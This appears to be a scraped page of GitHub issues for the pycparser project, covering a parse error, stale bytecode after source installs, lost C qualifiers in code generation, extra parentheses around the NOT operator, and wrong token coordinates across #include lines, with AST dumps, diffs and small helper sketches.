      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 193, in call_errorfunc
        r = errorfunc(token)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 1931, in p_error
        self._parse_error(
      File "/usr/local/lib/python3.9/site-packages/pycparser/plyparser.py", line 67, in _parse_error
        raise ParseError("%s: %s" % (coord, msg))
    pycparser.plyparser.ParseError: /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/i386/_types.h:98:27: before: __darwin_va_list
    

    The resulting file is also attached as test2.c.

    Thank you in advance!

    Archive.zip .

    pending-user-input 
    opened by vm2p 2
  • A source distribution install can generate .pyc files with stale bytecode


    Steps to reproduce: use --no-binary option to force pip to use the .tar.gz distribution instead of the wheel (the problem doesn't occur when using a wheel install)

    python3 -m pip install pycparser --no-binary=:all:

    Then the file pycparser/__pycache__/c_ast.cpython-39.pyc is stale and needs to be recompiled (a bad mtime header gets burnt into the pyc file).

    python3 -v -c "import pycparser" |& grep "stale\|bad mtime"
    # bytecode is stale for 'pycparser.c_ast'
    

    I guess the problem is somewhere inside _build_tables.py but I can't see what exactly.

    patches-welcome 
    opened by wimglenn 0
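The staleness that `python3 -v` reports can also be checked by hand, by comparing the mtime recorded in the .pyc header with the source file's mtime. The sketch below assumes CPython 3.7 or later, where the header is 16 bytes (magic, flags, source mtime, source size), and handles only timestamp-based .pyc files; `pyc_is_stale` is a hypothetical helper name.

```python
import importlib.util
import os
import struct


def pyc_is_stale(source_path):
    # True/False for timestamp-based .pyc files; None if there is no .pyc
    # or the .pyc is hash-based and carries no mtime to compare.
    pyc_path = importlib.util.cache_from_source(source_path)
    if not os.path.exists(pyc_path):
        return None
    with open(pyc_path, "rb") as handle:
        header = handle.read(16)
    if len(header) < 16:
        return None
    # Bytes 4-8 are the flags word, bytes 8-12 the recorded source mtime.
    flags, recorded_mtime = struct.unpack("<II", header[4:12])
    if flags != 0:
        return None
    source_mtime = int(os.stat(source_path).st_mtime) & 0xFFFFFFFF
    return recorded_mtime != source_mtime
```

Running it against the installed `pycparser/c_ast.py` would show whether the mismatch comes from the recorded mtime, although it does not explain which build step rewrote the source after compilation.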
  • C code generator failures with multiple qualifiers


    Sometimes the C code generator "forgets" about qualifiers, as shown in https://github.com/eliben/pycparser/pull/431. One such example is mixing _Atomic with const and auto. Consider the following code:

    self._assert_ctoc_correct('auto const _Atomic(int *) a;')
    

    This code would fail as it would generate auto int * _Atomic a; losing const. In particular, the issue is that CGenerator does not print quals for Decl. I.e. the following AST is generated:

    auto const _Atomic(int *) a;
    FileAST(ext=[Decl(name='a',
                      quals=['const'
                            ],
                      storage=['auto'
                              ],
                      funcspec=[
                               ],
                      type=PtrDecl(quals=['_Atomic'
                                         ],
                                   type=TypeDecl(declname='a',
                                                 quals=[
                                                       ],
                                                 type=IdentifierType(names=['int'
                                                                           ]
                                                                     )
                                                 )
                                   ),
                      init=None,
                      bitsize=None
                      )
                ]
            )
    

    and then the generator turns it into:

    auto int * _Atomic a;
    
    FileAST(ext=[Decl(name='a',
                      quals=[
                            ],
                      storage=['auto'
                              ],
                      funcspec=[
                               ],
                      type=PtrDecl(quals=['_Atomic'
                                         ],
                                   type=TypeDecl(declname='a',
                                                 quals=[
                                                       ],
                                                 type=IdentifierType(names=['int'
                                                                           ]
                                                                     )
                                                 )
                                   ),
                      init=None,
                      bitsize=None
                      )
                ]
            )
    

    An obvious fix is to print quals in _generate_decl(self, n):

    diff --git a/pycparser/c_generator.py b/pycparser/c_generator.py
    index ded8c65..5a977e5 100644
    --- a/pycparser/c_generator.py
    +++ b/pycparser/c_generator.py
    @@ -418,6 +418,7 @@ class CGenerator(object):
             s = ''
             if n.funcspec: s = ' '.join(n.funcspec) + ' '
             if n.storage: s += ' '.join(n.storage) + ' '
    +        if n.quals: s += ' '.join(n.quals) + ' '
             s += self._generate_type(n.type)
             return s
    

    But that route is not straightforward because it duplicates quals: _Atomic int x; now becomes _Atomic _Atomic int x;. The root cause appears to be earlier, since the _Atomic qualifier is already present twice in the AST:

    FileAST(ext=[Decl(name='x',
                      quals=['_Atomic'
                            ],
                      storage=[
                              ],
                      funcspec=[
                               ],
                      type=TypeDecl(declname='x',
                                    quals=['_Atomic'
                                          ],
                                    type=IdentifierType(names=['int'
                                                              ]
                                                        )
                                    ),
                      init=None,
                      bitsize=None
                      )
                ]
            )
    

    However, the original intention is not clear:

    1. Are quals meant to be duplicated in both Decl and TypeDecl, with the copy in Decl there only for user interaction (extra verbosity)?
    2. Or are the two meant to be different notions, with the duplicated quals in some places being accidental?

    I tried prototyping a fix assuming (1), but it was not immediately successful: quite a few tests started to fail, and the comparison did not work in the first place:

    diff --git a/pycparser/ast_transforms.py b/pycparser/ast_transforms.py
    index 367dcf5..f4f4786 100644
    --- a/pycparser/ast_transforms.py
    +++ b/pycparser/ast_transforms.py
    @@ -134,9 +134,16 @@ def fix_atomic_specifiers(decl):
         if typ.declname is None:
             typ.declname = decl.name
     
    +    return _fix_const_qualifiers(decl)
    +
    +def _fix_const_qualifiers(decl):
    +    if isinstance(decl, c_ast.Decl) and decl.quals:
    +        for qual in decl.quals:
    +            if qual not in decl.type.quals:
    +                decl.type.quals.append(qual)
    +        # decl.quals = []
         return decl
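
The merge step in the prototype above can be looked at in isolation. The sketch below uses hypothetical stand-in classes (`DeclNode`, `TypeNode`) rather than the real c_ast nodes, and only illustrates an order-preserving merge that copies a qualifier from the declaration to its type node when the type node does not already carry it. The input lists are taken from the AST dumps quoted in this issue.

```python
from dataclasses import dataclass, field
from typing import List


@dataclass
class TypeNode:
    """Hypothetical stand-in for a type node such as TypeDecl or PtrDecl."""
    quals: List[str] = field(default_factory=list)


@dataclass
class DeclNode:
    """Hypothetical stand-in for Decl: its own quals plus a nested type node."""
    quals: List[str]
    type: TypeNode


def push_quals_into_type(decl):
    """Append each Decl-level qualifier to the type node unless already there."""
    for qual in decl.quals:
        if qual not in decl.type.quals:
            decl.type.quals.append(qual)
    return decl


# `_Atomic int x;`: the qualifier is already on both nodes, so nothing changes.
atomic_int = push_quals_into_type(DeclNode(['_Atomic'], TypeNode(['_Atomic'])))

# `auto const _Atomic(int *) a;`: `const` lives only on the Decl and is copied.
atomic_ptr = push_quals_into_type(DeclNode(['const'], TypeNode(['_Atomic'])))
```

This avoids the doubled _Atomic, but it does not settle whether Decl.quals should be cleared afterwards (the commented-out line in the prototype), which is exactly the open question about intent.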
    
    patches-welcome 
    opened by vit9696 1
  • CGenerator doesn't consider the NOT operator when using reduce_parentheses=True

    When using the CGenerator class with reduce_parentheses=True, the output still includes unnecessary parentheses around instances of UnaryOp with the NOT operator.

    For example:

              Input: if (a && !b && (!c || d)) …
             Output: if (a && (!b) && ((!c) || d)) …
    Expected Output: if (a && !b && (!c || d)) …
    

    To get around this, I included UnaryOp in the list of simple nodes in _is_simple_node, though I'm not sure whether this would have unexpected consequences. Another possible solution would be to include it in the precedence_map, but I couldn't get an ideal output doing it that way.
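
To illustrate the precedence reasoning involved, here is a small standalone emitter. It does not use pycparser: the tuple-based tree, the `PRECEDENCE` table, and `emit` are all hypothetical names made up for this sketch. It treats unary operators as binding tighter than every binary operator, so a unary operand of a binary operator is never parenthesized. A nested unary operand stays parenthesized, since dropping those parentheses could turn `-(-x)` into `--x`.

```python
# Binary operator precedence (higher binds tighter). Unary operators bind
# tighter than all of these, so they need no parentheses as binary operands.
PRECEDENCE = {'||': 0, '&&': 1, '==': 2, '+': 3, '*': 4}


def emit(node):
    """Render a tuple-based expression tree with few parentheses."""
    kind = node[0]
    if kind == 'id':
        return node[1]
    if kind == 'unary':
        _, op, operand = node
        text = emit(operand)
        # Group anything that is not a plain identifier: a binary operand
        # needs it, and a nested unary keeps it to avoid `--x`.
        if operand[0] != 'id':
            text = '(' + text + ')'
        return op + text

    _, op, left, right = node
    prec = PRECEDENCE[op]

    def side(child, is_right):
        text = emit(child)
        if child[0] == 'binary':
            child_prec = PRECEDENCE[child[1]]
            # Left-associative: the right side also needs parentheses on a tie.
            if child_prec < prec or (is_right and child_prec == prec):
                return '(' + text + ')'
        return text

    return '%s %s %s' % (side(left, False), op, side(right, True))


# a && !b && (!c || d), built by hand as a left-associative tree.
EXPR = ('binary', '&&',
        ('binary', '&&', ('id', 'a'), ('unary', '!', ('id', 'b'))),
        ('binary', '||', ('unary', '!', ('id', 'c')), ('id', 'd')))
```

Calling `emit(EXPR)` reproduces the expected output from the report. Whether the same rule is safe inside CGenerator depends on where else _is_simple_node is consulted, which this sketch does not cover.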

    enhancement patches-welcome 
    opened by Kyvski 2
  • Bug in token coordinates

    I know this looks like a really niche example, but it was made as simple as possible. This behavior is actually quite common with "strange" includes. I assume it is not the expected behavior, and it is causing me a lot of problems in my analysis, so I wanted to know whether it can be fixed.

    // FILE intval.h
    1
    
    // FILE main.c
    int a =
    #include "intval.h" 
    ;
    
     int main() {  ;  }
    

    AST shown with coordinates:

    FileAST:  (at None)
      Decl <ext[0]>: a, [], [], [] (at C:/Users/Corrado/Desktop/main.c:1:5)
        TypeDecl <type>: a, [] (at C:/Users/Corrado/Desktop/main.c:1:5)
          IdentifierType <type>: ['int'] (at C:/Users/Corrado/Desktop/main.c:1:1)
        Constant <init>: int, 1 (at C:/Users/Corrado/Desktop/main.c:1:1)                <---------Coordinate is wrong
      FuncDef <ext[1]>:  (at C:/Users/Corrado/Desktop/main.c:5:6)
        Decl <decl>: main, [], [], [] (at C:/Users/Corrado/Desktop/main.c:5:6)
          FuncDecl <type>:  (at C:/Users/Corrado/Desktop/main.c:5:6)
            TypeDecl <type>: main, [] (at C:/Users/Corrado/Desktop/main.c:5:6)
              IdentifierType <type>: ['int'] (at C:/Users/Corrado/Desktop/main.c:5:2)
        Compound <body>:  (at C:/Users/Corrado/Desktop/main.c:5:1)
          EmptyStatement <block_items[0]>:  (at C:/Users/Corrado/Desktop/main.c:5:15)
    

    The marked coordinate is wrong. The line markers inserted by the cpp preprocessor are correct, and they properly report where the included file is entered and left.

    cpp -E output:

    # 1 "C:/Users/Corrado/Desktop/main.c"
    # 1 "<built-in>"
    # 1 "<command-line>"
    # 1 "C:/Users/Corrado/Desktop/main.c"
    int a =
    # 1 "C:/Users/Corrado/Desktop/intval.h" 1               <--------------entering
    1
    # 3 "C:/Users/Corrado/Desktop/main.c" 2              <----------------leaving
    ;
    
     int main() { ; }
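
As a rough illustration of how the line markers in that output can be read, the sketch below walks preprocessed text and assigns a (file, line) pair to each remaining source line. It is a standalone approximation, not pycparser's lexer: `map_lines` and `LINE_MARKER` are hypothetical names, and the file paths are shortened to `main.c` and `intval.h` for readability.

```python
import re

# GNU cpp line marker: `# <line> "<file>" <flags...>`
LINE_MARKER = re.compile(r'^#\s+(\d+)\s+"([^"]*)"')


def map_lines(preprocessed):
    """Return (file, line, text) for every non-blank, non-marker output line."""
    result = []
    filename, lineno = None, 0
    for raw in preprocessed.splitlines():
        match = LINE_MARKER.match(raw)
        if match:
            # A marker states the position of the line that follows it.
            lineno, filename = int(match.group(1)), match.group(2)
            continue
        if raw.strip():
            result.append((filename, lineno, raw.strip()))
        lineno += 1
    return result


CPP_OUTPUT = '''# 1 "main.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 1 "main.c"
int a =
# 1 "intval.h" 1
1
# 3 "main.c" 2
;

 int main() { ; }
'''

POSITIONS = map_lines(CPP_OUTPUT)
```

Under this reading the constant `1` belongs to line 1 of `intval.h` and the following `;` to line 3 of `main.c`, which suggests the markers carry enough information to produce a different coordinate than the reported main.c:1:1.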
    
    patches-welcome 
    opened by corradods 3
Owner
Eli Bendersky